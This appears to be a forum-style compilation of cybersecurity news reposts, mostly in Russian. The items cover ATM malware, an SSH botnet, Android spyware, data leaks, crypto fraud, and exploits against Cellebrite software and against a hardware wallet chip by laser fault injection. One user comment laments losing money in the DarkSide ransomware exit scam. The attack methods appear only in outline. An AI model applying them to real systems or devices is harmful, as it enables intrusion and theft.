Россия и Китай тестируют квантово-защищенную связь
Российские ученые
осуществили первый в России
эксперимент по квантово-криптографической передаче данных между Россией и
Китаем.
Использование китайского квантового коммуникационного спутника «Мо-цзы»
обеспечило передачу зашифрованных ключей на расстоянии свыше 3 800 км. С
помощью специально разработанной российскими специалистами наземной станции в
Звенигороде был выполнен обмен зашифрованными изображениями размером 256×64
пикселей с партнерской станцией в Наньшане, Китай.
🛰 Ключевым достижением проекта стало создание в Звенигороде уникальной наземной станции, способной проводить стабильные сеансы связи со спутником и декодировать поляризационные состояния одиночных фотонов.
#КвантоваяСвязь #ТехнологическийПрорыв #РоссияКитай
Хотите скрыть финансовые транзакции от правоохранительных органов? У секретной службы США есть несколько аналогичных советов: “Используйте наличные”.
Агентство вместе с калифорнийской уголовной оперативной группой рассказали о том, как они раскрывают крипто-преступления, в продолжительной сессии “Спроси меня о чем угодно” на Reddit, рассказав о мошенничестве с разделкой свиней, коллекции NFT секретной службы и наилучшем способе скрыть транзакции от правоохранительных органов.
В понедельник местное отделение Секретной службы в Сан-Франциско вместе с компьютерной командой региональных правоохранительных органов Bay Area в течение двух часов отвечали на вопросы в субреддите r / CryptoCurrency в целях просвещения пользователей криптовалют.
Хотя криптовалюта может быть предпочтительной валютой для некоторых воров и финансовых пирамид, официальные лица заявили, что блокчейн на самом деле может стать золотой жилой для отслеживания финансовых преступлений.
«Блокчейн предоставляет нам потрясающую возможность отслеживать поток денег»,
Чиновники принимают меры после того, как в прошлом году был достигнут рекорд по крипто-взломам. Согласно данным Chainalysis, во всем мире в результате 32 отдельных атак было украдено почти 776 миллионов долларов, в основном на протоколы децентрализованного финансирования (DeFi).
Наряду с защитой лидеров США, Секретная служба также охраняет финансовую инфраструктуру страны. В офисе агентства в Сан-Франциско есть группа специальных агентов и аналитиков, занимающихся криптопреступлениями, и они заявили, что белая книга по биткойнам “обязательна к прочтению для любых новых агентов в нашей команде!”
REACT - это целевая группа местных детективов и федеральных партнеров, созданная законодательным органом Калифорнии в конце 1990-х годов для расследования “преступлений в области высоких технологий”. Команда сосредоточилась на так называемых криптокражах с разделкой свиней, при которых мошенник завоевывает доверие жертвы, а затем крадет криптовалюту, и заявляет, что вернула миллионы украденных средств.
«Мы МОЖЕМ и ДЕЛАЕМ возврат средств и возвращаем их жертвам», - сказал REACT, отметив, что за последние девять месяцев он вернул украденную криптовалюту 17 жертвам.
Секретная служба заверила реддиторов, что у правоохранительных органов есть инструменты для мониторинга криптовалют так же надежно, как и традиционных финансов. Тем не менее, агентство отметило, что доля отмывания денег, совершаемого в криптовалюте, меньше, чем отмывание денег, которое происходит в бумажной валюте, согласно отчету Министерства финансов США за прошлый год.
Помимо рассмотрения крипто-преступлений и возврата средств, даже поиск жертв может быть сложной задачей для правоохранительных органов. Секретная служба заявила, что нашла жертву на Reddit, которая разместила сообщение об инвестиционной афере, но не сообщила об этом по официальным каналам, таким как Центр рассмотрения жалоб на интернет-преступления, также известный как IC3.
«Каждый случай индивидуален, но никакой надежды, если вы не сообщаете», - сказали в секретной службе. «Правдивая история — мы наткнулись на жертву, которая сообщила о забое свиньи на Reddit, но не на IC3 или полицию. Нам пришлось связаться через Reddit, чтобы заставить жертву подать отчет IC3. В результате жертва получит свои деньги обратно».
source: reddit.com/r/CryptoCurrency/comments/13h2mar/ama_on_rcryptocurrency_with_the_us_secret_service
Компания Metabase Q сообщила о появлении нового семейства вредоносных программ, нацеленного на банкоматы в Латинской Америке. Вредонос, получивший название FiXS, атакует мексиканские банки с начала февраля 2023 года, но также может использоваться для компрометации любых других банкоматов, поддерживающих CEN XFS.
Исследователи пишут, что точный способ компрометации пока остается неизвестным, но вполне вероятно, что «злоумышленники нашли способ взаимодействия с банкоматом через сенсорный экран». Также отмечается, что малварь для банкоматов прячется «внутри другой программы, которая не выглядит вредоносной». Если точнее, образец, изученный специалистами, доставляется посредством дроппера Neshta (conhost.exe), который написан на Delphi и впервые был обнаружен еще в 2003 году.
По словам специалистов, FiXS похож на другой вредонос для банкоматов под названием Ploutus , который позволяет преступникам извлекать наличные из банкоматов с помощью внешней клавиатуры или путем отправки SMS-сообщений. Это тоже позволяет предположить, что атакующие внедряют малварь через физический доступ к банкоматам.
Помимо необходимости взаимодействия через внешнюю клавиатуру, FiXS может использоваться для любых банкоматов на базе Windows и не привязан к конкретному вендору. Фактически малварь способна заразить любую машину, поддерживающую CEN/XFS (eXtensions for Financial Services).
Одной из примечательных особенностей FiXS является его способность заставить банкомат выдать деньги через 30 минут после последней перезагрузки (используя Windows GetTickCount API). В Metabase Q предполагают, что вскоре после установки вредоносного ПО выданные наличные извлекаются мулами.
«FiXS имплементирован с помощью API CEN XFS, которые есть практически в каждом банкомате на базе Windows (как и другие вредоносные программы, например, RIPPER)», — отмечают исследователи.
• Source: https://xakep.ru/2023/03/07/fixs/
А также осуществляет майнинг и DDoS-атаки.
Команда Akamai Security Intelligence Response Team (SIRT) обнаружила новое
вредоносное ПО, которое использует SSH-протокол (Secure Shell) для
проникновения в целевые системы, чтобы осуществлять майнинг криптовалюты и
проводить DDoS-атаки.
Эксперты назвали вредоносное ПО KmsdBot. Оно разработано на основе Golang и
нацелено различные компании – от игровых до автомобильных брендов и охранных
фирм.
Ботнет заражает системы через SSH-соединение, использующее «слабые» учетные
данные для входа в систему. KmsdBot не остается постоянным в зараженной
системе, чтобы избежать обнаружения.
Вредоносное ПО получило свое название от исполняемого файла «kmsd.exe»,
который загружается с удаленного сервера после успешной компрометации. Он
также предназначен для поддержки нескольких архитектур - Winx86, Arm64, mips64
и x86_64.
KmsdBot может выполнять операции сканирования и самораспространения, загружая
список комбинаций имени пользователя и пароля. Ботнет также умеет
контролировать процессы майнинга и обновления вредоносного ПО.
По словам Akamai, первой обнаруженной целью KmsdBot была игровая компания
FiveM, многопользовательский мод для GTA V, который позволяет игрокам получать
доступ к пользовательским ролевым серверам.
DDoS-атаки ботнета включают атаки 4-го и 7-го уровней OSI , при которых
отправляется поток запросов TCP, UDP или HTTP GET, чтобы перегрузить ресурсы
целевого сервера и привести его к состоянию «отказ в обслуживании».
Примечательно то, что ботнет KmsdBot начинался как бот для игрового
приложения, а превратился в инструмент для атаки на крупные и дорогие бренды.
Popular musical instrument marketplace Reverb has suffered a data breach after an unsecured database containing customer information was exposed online.
Reverb is the largest online marketplace devoted to selling new, used, and vintage musical instruments and equipment.
Today, Reverb customers began receiving data breach notifications stating that
customer information was exposed, including customers' names, addresses, phone
numbers, and email addresses.
Reverb data breach
notification
While Reverb's notification does not explain how they exposed the data,
security researcher Bob Diachenko sheds
some light on what happened.
Diachenko says he discovered an unsecured Elasticsearch server publicly exposed on the Internet that contained more than 5.6 million records.
Each record contained information about a particular listing on Reverb.com, including the full name, email address, phone number, mailing address, PayPal email, and listing/order information.
Reverb.com database
sample
When Diachenko finds an unsecured database, he always notifies the company to
secure the database. After analyzing the data, he noticed many users with
@reverb.com email addresses and matched orders in the database with those on
the site.
"To confirm my thought, I ran a quick check and was able to find several high- profiled sellers details, including Bill Ward of Black Sabbath, Jimmy Chamberlin of the Smashing Pumpkins, Alessandro Cortini of Nine Inch Nails and more," explained [a report](https://www.linkedin.com/pulse/more- than-56-million-records-reverb-sellers-details-leaked-diachenko) by Diachenko.
Diachenko told BleepingComputer that by the time he confirmed the database belonged to Reverb, the site had already secured the database.
While the database was likely unsecured for only a short period, if a security researcher could find the database, so could a threat actor.
With this in mind, it is safer to assume that your data was exposed and be on the lookout for possible phishing emails using this information.
As your passwords were not exposed in this breach, Reverb is not resetting them. However, Reverb recommends users routinely reset their passwords for better security.
Преступную схему разоблачили сотрудники Департамента киберполиции совместно с Главным следственным управлением Нацполиции и работниками службы безопасности банка.
Трое мужчин в возрасте 32-36 лет покупали на хакерских форумах у DarkNet базы данных клиентов операторов мобильной связи и банковских учреждений. Имеющиеся данные позволяли фигурантам осуществлять перевыпуск SIM-карт и получить доступ к онлайн-банкингу потерпевших. Деньги граждан злоумышленники выводили на счета подставных лиц.
Персональные данные граждан фигуранты также использовали для оформления онлайн-кредитов.
Таким образом мошенники обманули более двух сотен граждан. По предварительным подсчетам, сумма убытков может достигать 10 миллионов гривен.
Правоохранители провели 21 обыск по местам жительства фигурантов в Днепропетровской, Полтавской областях и в Киеве. Изъяты и направлены на экспертные исследования компьютерная техника, которая использовалась в противоправной деятельности.
Открыто уголовное производство по ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Фигурантам объявлено о подозрении, им грозит до двенадцати лет лишения свободы с конфискацией имущества.
Процессуальное руководство осуществляет Офис Генерального прокурора Украины. Следственные действия проводились совместно с работниками СБУ.
Инфобез уровня Mercedes-Benz: сотрудник компании оставил в публичном репозитории личный GitHub ключ разработчика. Где он и пролежал на протяжение 4 месяцев, открывая доступ ко всей внутренней кухне автогиганта.
Токен случайно обнаружили безопасники из RedHunt Labs во время рутинного мониторинга. GitHub Token давал доступ к закрытым репозиториям компании с внутренними архивами, чертежами, дизайн-документами, API и прочим-прочим. Включая ключи к репам с исходниками, вёдрам Azure и AWS и базе Postgres. В общем, полный набор. Пока неясно, получал ли кто-либо доступ ко всей этой сокровищнице, открытой с сентября прошлого года. Представители Mercedes-Benz отказываются раскрывать, ведут ли они мониторинг, чтобы отслеживать несанкционированный доступ. Почему? А из соображений… информационной безопасности. Что сказать, вовремя вспомнили.

Security Concerns - RedHunt Labs ](https://redhuntlabs.com/blog/mercedes-benz- source-code-at-risk-github-token-mishap-sparks-major-security-concerns/)
Preface In a recent turn of events, RedHunt Labs’ Attack Surface Management (ASM) research team uncovered a potentially disastrous data leak incident involving the automotive giant, Mercedes-Benz. This incident not...
 redhuntlabs.com
Выявить злоумышленников удалось сотрудникам отдела по борьбе с организованной преступностью Управления уголовного розыска МВД по Чувашской Республике во взаимодействии со службой безопасности акционерного общества «Почта России». Мошенники размещали объявления о продаже дорогостоящих гаджетов, а затем высылали наложенным платежом дешевые устройства. Вернуть товар, абсолютно не соответствующий заказанному, и получить свои деньги обратно потерпевшим не удавалось, так как общение с продавцами прекращалось сразу после оплаты посылки. Таким образом группа совершила 13 фактов мошенничества в отношении жителей Чувашии, причинив ущерб более 125 000 рублей. По оперативным данным, пострадали и граждане других субьектов Российской Федерации. Точное количество потерпевших предстоит установить в ходе расследования.
В ходе служебной командировки в городе Санкт–Петербурге и Ленинградской области сотрудниками МВД по Чувашии и СУ СК России по Чувашии при силовой поддержке бойцов Росгвардии были задержаны трое предполагаемых участников группы – организатор и его сообщники, 26-30 лет, жители названного региона. В ходе обысков было изъято около 200 000 рублей, 30 сотовых телефонов, оргтехника, банковские карты, почтовые извещения и другие предметы, представляющие оперативный интерес и имеющие доказательственное значение по делу. Троим фигурантам СУ СК России по Чувашии предъявлено обвинение по признакам преступления, предусмотренного ч. 4 ст. 159 УК РФ «Мошенничество». В отношении них избрана мера пресечения в виде заключения под стражу.
Участники индустрии вновь пострадали от мошенничества. Разработчик проекта NFT Evolved Apes удалил аккаунт в Твиттере, сайт проекта и скрылся с ETH на $2.7 млн.
Согласно [публикации Vice Motherboard](https://www.vice.com/en/article/y3dyem/investors-spent-millions- on-evolved-apes-nfts-then-they-got-scammed), в конце прошлой недели среди инвесторов проекта NFT Evolved Apes начало расти беспокойство. Через несколько дней после запуска проекта анонимный разработчик под ником Evil Ape исчез, предварительно удалив официальный аккаунт в Twitter и сайт проекта. Кроме того, он вывел 798 ETH стоимостью $2.7 млн из кошелька проекта в рамках нескольких транзакций.
Согласно описанию проекта Evolved Apes на рынке NFT OpenSea, это набор из 10 000 уникальных NFT, запертых в «стране беззакония». Герои NFT «борются за выживание, победит только сильнейшая обезьяна». Последние слова - отсылка к игре NFT, которую планировал запустить создатель проекта. Деньги, полученные от первичной публичной продажи NFT и комиссий на вторичном рынке, предназначались для расходов, связанных с развитием проекта.
Инвесторы в Evolved Ape заметили несколько тревожных признаков перед исчезновением создателя проекта. Как заявил изданию Motherboard один из инвесторов, после публичной продажи NFT 24 сентября размещаемые от имени проекта заявления казались подозрительно непрофессиональными, а некоторые лидеры исчезли с арены. Однако инвесторы списали это на недостаток опыта создателей проекта.
По словам пользователя Mike_Cryptobull, сообщество Evolved Apes обнаружило, что победители конкурса в социальных сетях не получили свои призовые NFT от проекта, художнику тоже не заплатили. Инвестор Mike_Cryptobull, который потратил 3 ETH на 20 Evolved Apes, собрал все известные факты о проекте и разработчике:
«Произошло вот что: Evil Ape умыл руки. Он вывел с кошелька проекта все ETH, которые должны были использоваться для оплаты работы художников, маркетинговых компаний и разработки игры», - написал он в отчете.
Несмотря на исчезновение всех денег, сообщество Evolved Apes планирует дальше развивать проект. Mike_Cryptobull объявил в отчете, что он и владельцы NFT создадут проект Fight Back Apes на основе Evolved Apes. Владельцы Evolved Apes автоматически получат токены Fight Back Apes.
Исчезновение основателя проекта пока не оказало влияние на торги Evolved Apes на OpenSea, где коллекция все еще проходит проверку. С конца прошлой недели, когда появилась первая информация о возможном мошенничестве, было проведено более 574 продаж NFT на 13.9 ETH.
Мошенничество в индустрии криптовалют, а особенно DeFi и NFT, не редкость. В июне анонимная команда разработчиков проекта DeFi распродала свои токены, вызвав обвал курса, и скрылась. Создатели WhaleFarm похитили криптовалюты клиентов на $2.3 млн. Незадолго до этого аналогичное мошенничество совершили разработчики проекта DeFi Polywhale.
Сотрудники ФСБ задержали хакера, который незаконно получал сведения о логино- паролевых парах от электронных платежных инструментов для последующего хищения крупных сумм денег, сообщает пресс-служба РУФСБ России по Тюменской области.
"В результате оперативно-розыскных мероприятий сотрудники РУФСБ России по Тюменской области пресекли противоправную деятельность гражданина России, который, осуществлял неправомерный доступ к российским и зарубежным интернет- ресурсам, получая сведения о логино-паролевых парах от электронных платежных инструментов в целях последующего хищения денежных средств в крупном размере",
Деньги, полученные преступным путем, он выводил через электронный кошелек на банковскую карту и тратил по своему усмотрению.
Следственный отдел МО МВД России "Голышмановский" возбудил уголовное дело по признакам преступления, предусмотренного ч. 2 ст. 272 УК РФ (неправомерный доступ к компьютерной информации, причинивший крупный ущерб). Максимальное наказание по статье предусматривает до 4 лет лишения свободы.
В настоящее время РУФСБ устанавливает другие эпизоды его противоправной деятельности.
Сотрудниками отдела по борьбе с противоправным использованием информационно- коммуникационных технологий УМВД России по Астраханской области при силовой поддержке бойцов специального назначения Росгвардии пресечена незаконная деятельность 48-летнего местного жителя. Мужчина подозревается в том, что вносил изменения в программное обеспечение оборудования одного из крупных российских операторов, позволяющие осуществлять просмотр 183 кодированных спутниковых телевизионных каналов цифрового вещания без внесения абонентской платы.
По имеющейся информации, ранее мужчина подрабатывал в областном центре установкой спутникового телевидения и ремонтом соответствующих приемников- ресиверов. Несколько лет назад к нему стали поступать жалобы от клиентов, которым он устанавливал оборудование, о том, что у них не работает цифровое телевидение. Тогда мужчина, обладая необходимыми знаниями в сфере компьютерной информации, выяснил, что через специальное ПО можно заменить микропрограммы смарт-карт. После этого мужчина наладил сбыт «перепрошитого» телевизионного оборудования на территории Астраханской области, а также за ее пределами.
Для этого умелец размещал предложения о продаже устройств на сайте бесплатных объявлений. Стоимость одной модифицированной смарт-карты составляла порядка 1200 рублей.
Следователями Следственной части Следственного Управления УМВД России по Астраханской области в отношении астраханца возбуждено уголовное дело по ч. 2 ст. 273 УК РФ (Создание, использование и распространение вредоносных компьютерных программ). На период расследования ему избрана мера процессуального принуждения в виде обязательства о явке.
Эксперты по кибербезопасности обнаружили несколько опасных уязвимостей в популярном текстовом редакторе Notepad++ . Эти уязвимости основаны на переполнении буфера (Buffer Overflow) и могут быть использованы злоумышленниками для выполнения произвольного кода на компьютере жертвы.
Об уязвимостях сообщил один из исследователей компании GitLab. Согласно его недавнему отчёту , в Notepad++ присутствуют следующие критические уязвимости:
Эти уязвимости позволяют злоумышленнику при открытии жертвой обычного текстового файла (специально подготовленного заранее) — получить полный контроль над уязвимой системой. На момент публикации данной новости разработчики Notepad++ пока не выпустили обновлений, устраняющих вышеописанные недостатки безопасности.
Notepad++ — популярный кроссплатформенный текстовый редактор с открытым исходным кодом, написанный на C++. Он поддерживает удобную работу с несколькими вкладками и файлами в одном окне. Notepad++ используется миллионами разработчиков и IT-специалистов по всему миру.
Уязвимости были обнаружены в результате аудита безопасности исходного кода редактора, проведённого экспертами GitLab. Согласно их отчёту, проблемы связаны с некорректной обработкой буферов при выполнении ряда функций.
Эксперты рекомендуют пользователям Notepad++ проявлять осторожность при открытии непроверенных файлов до выхода официальных исправлений. Киберпреступники могут активно использовать эти уязвимости для атак, в том числе применяя их во вредоносном ПО.
Разработчики Notepad++ пока также не прокомментировали ситуацию и не сообщили о планах по их устранению. Согласно правилам раскрытия уязвимостей, информация о них была опубликована в открытом доступе после истечения срока, отведённого на их исправление. То есть девелоперы компании, ответственной за разработку продвинутого блокнота, были уведомлены об уязвимостях заранее.
Эксперты напоминают, что своевременная установка обновлений безопасности — важная мера защиты от киберугроз. Поэтому пользователям рекомендуется регулярно проверять наличие обновлений к используемым программам и незамедлительно их устанавливать. Это позволит своевременно нейтрализовать угрозы безопасности и избежать возможных негативных последствий.
© securitylab
23-летний самопровозглашенный «криптокороль» Эйден Плетерски из Канады стал жертвой похитителей, которые пытали его и требовали выкуп в размере $3 млн. Об этом говорится в судебных документах.
Ранее Плетерски управлял инвестиционной схемой, участникам которой обещал заработок на криптовалютах. Но из полученных им $41,5 млн вложил только $670 000, то есть менее 2% от общей суммы.
При этом около $16 млн он потратил на аренду частных самолетов, поездки и покупку автомобилей, включая «Ferrari, четыре Audi, три Lamborghini, три McLarens, Land Rover и BMW».
В августе 2022 года Плетерски объявили банкротом. С этого момента по его делу были поданы иски на общую сумму $25 млн канадских долларов ($18,2 млн).
В декабре полиция Торонто уведомила управляющего делами о банкротстве Роба Стельцера о похищении Плетерски. Как удалось установить, неизвестные в течение трех дней удерживали его, пытали, разрешая связываться только с ограниченных кругом лиц для получения выкупа.
В итоге «криптокороля» отпустили при условии, что он быстро найдет деньги и не станет обращаться в правоохранительные органы.
Сам Плетерски заявил, что причиной провала его схемы стало падение котировок криптовалют в ноябре 2021 года. Предпринятые им попытки возместить некоторым инвесторам деньги привели только к росту убытков.
source:
[https://docs.grantthornton.ca/docum...4.1613509646.1679867206-1738085645.1679867206](https://docs.grantthornton.ca/document-
folder/viewer/docul8LWsxcWho7J/155791662019177193?_gl=1cbjbqk_gaMTczODA4NTY0NS4xNjc5ODY3MjA2_ga_JLRBBJ6PTP*MTY3OTg2NzIwNi4xLjAuMTY3OTg2NzIwOS41Ny4wLjA.&_ga=2.75019794.1613509646.1679867206-1738085645.1679867206)
Об этом заявил директор Агентства национальной безопасности США генерал Пол Накасоне.
«Мы провели серию операций по всему спектру: наступательные, оборонительные и информационные операции», — рассказал Накасоне о деятельности военных хакеров.
По его словам, в ходе некоторых операций США выявляли иностранных хакеров и идентифицировать их инструменты до того, как они могли быть использованы против Америки.
Генерал Накасоне впервые подтвердил, что США проводят наступательные хакерские операции в поддержку Украины в ответ на российское вторжение.
«Возможность для нас делиться этой информацией, обеспечивать ее точность, своевременность и действенность в более широком масштабе оказалась очень и очень важной в этом кризисе», — сказал директор АНБ.
Чиновник вспомнил атаку российских хакеров на спутниковую систему Viasat и заявил, что опасность этих атак сложно преувеличить. По его словам, военное руководство США делает все, чтобы защититься от атак российских хакеров на американскую цифровую инфраструктуру.
В АНБ также запустили новую программу, в рамках которой специалисты из киберкомандования США отправились в 16 союзных стран, где они будут работать с разведданными. Известно, что во время одной из таких операций американские военные специалисты находились в Украине незадолго до даты вторжения.
«Мы поехали в декабре 2021 года по приглашению киевского правительства и пробыли там срок почти 90 дней», — сказал генерал.
Ранее бывшие сотрудники ЦРУ советовали своим коллегам сегодня «заткнуться» и перестать хвастаться своей ролью в военных успехах Украины.
Это заявление было связано с сообщениями в американской прессе, согласно которым разведка США сыграла важную роль в уничтожении российских генералов в Украине, а также потоплении флагманского крейсера Москва в Черном море.
«Меня удивляет степень официального подтверждения роли разведки США в потоплении Москвы и уж тем более в убийстве генералов. Публичное подтверждение масштабной роли США в неудачах, причиненных русским, может спровоцировать Путина на эскалацию», — говорил бывший офицер ЦРУ Пол Пиллар.

Ukraine, says head of Cyber Command ](https://news.sky.com/story/us-military- hackers-conducting-offensive-operations-in-support-of-ukraine-says-head-of- cyber-command-12625139)
In an exclusive interview with Sky News, General Paul Nakasone confirmed for the first time that the US had "conducted a series of operations" in response to Russia's invasion of Ukraine.
 news.sky.com
Компания Group-IB, занимающаяся борьбой с киберпреступностью, поучаствовала вместе с Интерполом, Palo Alto Networks и правоохранительными органами Нигерии в совместной операции, которая привела к задержанию 11 граждан. Арестованные подозреваются в организации кибератак на корпоративную почту (Business Email Compromise, BEC).
Как отметили специалисты, 11 задержанных являются членами киберпреступной группировки, известной под именем TMT (SilverTerrier). Исследователи наблюдают за этой группой с 2019 года.
Международная операция Falcon II стала продолжением Falcon I. Правоохранителям удалось изъять устройства, на которых хранились файлы злоумышленников. Чуть позже Group-IB провела криминалистический анализ этих файлов.
Falcon II заняла 10 дней — с 13 по 22 декабря 2021 года. Представители Интерпола отметили, что аресту очень поспособствовал оперативный обмен данными киберразведки. По данным правоохранителей, подозреваемые связаны с компрометацией корпоративной электронной почты, затронувшей более 50 тысяч жертв.
У одного из арестованных на ноутбуке нашли более 800 тысяч учётных данных, которые, предположительно, принадлежат жертвам кибератак.
суки все убежали. особенно darkside после их exit-scam - украли всё наших денег короче
__
](https://www.bloomberg.com/news/newsletters/2021-06-28/darkside-revil-go- quiet-after-colonial-pipeline-jbs-hacks)
www.bloomberg.com
Создатель Signal, известный криптограф, хакер, исследователь и анархист Мокси Марлинспайк (Moxie Marlinspike) изучил продукты известной израильской киберкриминалистической компании Cellebrite и выявил ряд проблем в их работе. В частности, баги позволили ему выполнить вредоносный код на компьютере под управлением Windows, который использовался для анализа устройств.
Напомню, что Cellebrite – это независимые киберкриминалисты, которые специализируются на извлечении данных с мобильных устройств (iOS и Android). К примеру, несколько лет назад израильскую фирму называли основным кандидатом на роль подрядчика ФБР, когда правоохранители искали специалистов для взлома iPhone террориста. В целом Cellebrite не раз помогала правительствам и правоохранительным органам со всего мира взламывать конфискованные мобильные телефоны (в основном за счет использования уязвимостей, на которые игнорировали производители устройств).
Как Марлинспайк получил доступ к оборудованию Cellebrite, неизвестно. Сам он иронизирует, что это произошло благодаря «невероятному совпадению»: якобы он шел по улице и «увидел, как из грузовика выпал небольшой пакет» с логотипом Cellebrite.

Вероятно, приобрести такой набор было не так уж сложно. Еще в 2016 году журналисты Vice Motherboard проводили собственный эксперимент, который показал — приобрести такой набор может кто угодно.
В блоге Signal эксперт рассказывает, что ПО Cellebrite работает путем анализа данных, поступающих из ненадежного источника. То есть софт принимает инпут, который может быть неправильно отформатирован, а это может спровоцировать повреждения информации в памяти, что уже приведет к выполнению произвольного кода в системе.
«Изучая UFED и Physical Analyzer мы были удивлены, обнаружив, что безопасности собственного программного обеспечения Cellebrite уделялось очень мало внимания. Отсутствуют стандартные в отрасли средства защиты от эксплоитов, зато присутствует множество возможностей для эксплуатации», — пишет эксперт.
Click to expand...
Также исследователь обнаружил, что ПО Cellebrite использует старый опенсорсный исходный код, который разработчики Cellebrite не обновляли почти десять лет (хотя обновления безопасности за это время не раз выходили).
В итоге Марлинспайку удалось запустить произвольный код на машине с Cellebrite, когда та анализировала специально подготовленный файл на сканируемом устройстве.
__https://twitter.com/x/status/1384906127360548869
«Включив специально отформатированный, но в целом безобидный файл в приложение на устройстве, которое затем просканирует Cellebrite, можно выполнить код, который повлияет не только на отчет Cellebrite, создаваемый при этом сканировании, но также произвольным образом затронет все предыдущие и будущие отчеты Cellebrite, со всех ранее просканированных устройств и всех будущих устройств: можно вставить или удалить текст, электронную почту, фотографии, контакты, файлы или любые другие данные. И всё это без каких- либо обнаруживаемых временных меток или проблем с контрольной суммой».
Click to expand...
Марлинспайк опубликовал доказательство успешной эксплуатации продукта UFED, его пейлоад использует Windows API MessageBox:
[](https://xakep.ru/wp- content/uploads/2021/04/346583/MoxiePoCellebrite.jpg)
Кроме того, Марлинспайк нашел в установщике для Packet Analyzer пакеты MSI с цифровой подписью от Apple. Судя по всему, они извлекаются из установщика Windows для iTunes 12.9.0.167 и содержат файлы DLL, которые помогают ПО Cellebrite взаимодействовать с iOS-устройствами и извлекать из них данные.
[](https://xakep.ru/wp- content/uploads/2021/04/346583/cellebrite-msi.png)
Марлинспайк резюмирует, что он с радостью предоставит разработчикам Cellebrite подробные сведения обо всех уязвимостях, если в ответ компания поступит так же со всеми уязвимостями, которые она использует для своих сервисов «сейчас и в будущем».
Представители Cellebrite уже сообщили СМИ, что компании очень важна «защищенность и целостность данных клиентов», а также заверили, что «постоянно проверяют и обновляют» свое программное обеспечение. При этом в компании никак не прокомментировали обнаруженные экспертом проблемы, а также не сообщили, имела ли компания разрешение на использование программного обеспечения Apple.
Источник: xakep.ru/2021/04/22/marlinspike-vs-cellebrite/
На этой неделе Министерство юстиции США предъявило обвинения во взломе системы местного водоканала 22-летнему жителю Канзаса Уайятту Травничеку (Wyatt Travnichek).
Власти заявляют, что Травничек взломал сеть сельского водного округа № 1 в Элсуорте и «выполнял действия, которые останавливали процессы на объекте и влияли на процедуры очистки и дезинфекции [воды], с целью нанести вред сельскому водному округу №1 в Элсворте». При этом известно, что с января 2018 года по январь 2019 года обвиняемый работал на этом самом водоканале, после чего уволился.
Судебные документы умалчивают о том, была ли атака Травничека успешной, или взлом заметили вовремя, но правоохранители уверены, что его действия поставили под угрозу безопасность и здоровье всего местного сообщества.
Если Травничека признают виновным, ему грозит до пяти лет лишения свободы и штраф в размере до 250 000 долларов за взлом компьютерной системы, а также до 20 лет тюрьмы и штраф в размере до 250 000 долларов за вмешательство в работу системы водоснабжения.
Интересно, что этот инцидент никак не связан с другим похожим случаем, произошедшим в феврале 2021 года в американском городе Олдсмар. Тогда неизвестный злоумышленник получил доступ к системам городских водоочистных сооружений и изменил химический состав воды. Причем взломщик проделал это при помощи TeamViewer на компьютере одного из сотрудников.
• Source: justice[.]gov/usao-ks/pr/indictment-kansas-man-indicted-tampering- public-water-system
Исследователи из компании Zimperium обнаружили нового шпионского вредоноса для Android, который может воровать данные, сообщения, изображения или вообще захватить контроль над устройством. Какого-либо названия малвари специалисты не дали.
Спайварь маскируется под обновление системы (приложение System Update) и найти ее можно только в сторонних магазинах приложений для Android, то есть в Google Play Store вредонос никогда не проникал. Также исследователи отмечают, что распространяться на другие устройства самостоятельно угроза не может, что существенно ограничивает ее возможности и количество пострадавших пользователей. Но при этом вредонос способен похитить с зараженного устройства практически любую информацию:
«Получив контроль, хакеры могут записывать аудио и телефонные звонки, делать фотографии, просматривать историю браузера, получить доступ к сообщениям в WhatsApp и так далее», — пишут исследователи.
Click to expand...
Эксперты перечисляют, какие данные может украсть спайварь:
Причем малварь будет воровать только превью видео и изображений, тем самым уменьшая расход трафика, чтобы не привлекать внимание пользователя к фоновой активности.
Помимо этого, как было сказано выше, вредонос может записывать аудио, телефонные разговоры жертвы, а также время от времени делать снимки через фронтальную или заднюю камеру девайса.
Отчет Zimperium гласит, что после установки малварь отправляет на свой управляющий сервер Firebase различные данные, включая статистику хранилища, данные о типе подключения к интернету и наличии различных приложений, таких как WhatsApp. При этом Firebase используется только для передачи команд, а отдельный C&C-сервер для сбора украденных данных (с помощью POST-запросов).
Данные спайварь собирает напрямую, если имеет root-доступ, или использует Accessibility Services, обманом заставив жертву включить эту функцию на скомпрометированном устройстве.
Еще одна интересная особенность вредоноса: для маскировки вредоносной активности он отображает поддельные уведомления о поиске обновлений, когда получает новые команды от своих операторов.

Индикаторы компрометации и подробный технический анализ угрозы можно найти в отчете Zimperium.
Источник: xakep.ru/2021/03/29/system-update-spyware/
Специалист по безопасности аппаратного обеспечения компании Ledger Оливье Эриво (Olivier Heriveaux) представил на конференции Black Hat в Лас-Вегасе новую атаку по времени, позволяющую извлекать данные из компьютерных чипов с помощью лазера.
Как пояснил Эриво, микросхемы чипов чувствительны к ультрафиолетовому излучению. Для извлечения данных исследователь воздействовал на атакуемую электронику лазерным лучом, направляя его точно в нужное место, точно в нужное время. Лазер вызывал сбои в нормальной работе чипа, благодаря чему специалисту удалось извлечь из него данные.
В частности, Эриво интересовал закрытый ключ, с помощью которого можно расшифровать данные, хранящиеся в аппаратном криптовалютном кошельке Coldcard. После извлечения чипа из устройства и подготовки его к атаке, исследователь обнаружил, что для обхода защиты чипа и получения ключа достаточно воздействовать лазером в нужные места всего дважды.
Для атаки, требующей такой невероятной точности, немного удивительно, сколько проб и ошибок брутфорса было потрачено на исследование. Для начала исследователь включал лазер через случайные интервалы в течение целого дня, что дало более 100 тыс. точек данных. Затем он нанес на карту все воздействия лазером, вызвавшие неисправности, с целью выяснить, где и когда оно было наиболее эффективным.
Для успешного проведения атаки очень важно было тщательно извлечь данные об энергопотреблении микросхемы, отображаемые с помощью осциллографа. Далее Эриво загрузил в чип открытый файл и изучил график использования електроэнергии. Затем он сравнил полученные данные с графиком реакции чипа на обработку закрытого файла. Обнаружив точки расхождения, исследователь определил моменты, когда воздействие лазерным лучом могли дать результаты.
Описанный выше процесс позволил Эриво проверить влияние лазера на чип. Сравнивая два графика энергопотребления, исследователь в конце концов обнаружил обстоятельства, когда воздействие лазером заставляло график энергопотребления чипа при обработке закрытого файла выглядеть так же, как график энергопотребления при обработке открытого файла. Как показало исследование вначале, необходимы четыре лазерных воздействия, но в конце концов исследователь обнаружил, что достаточно только двух.
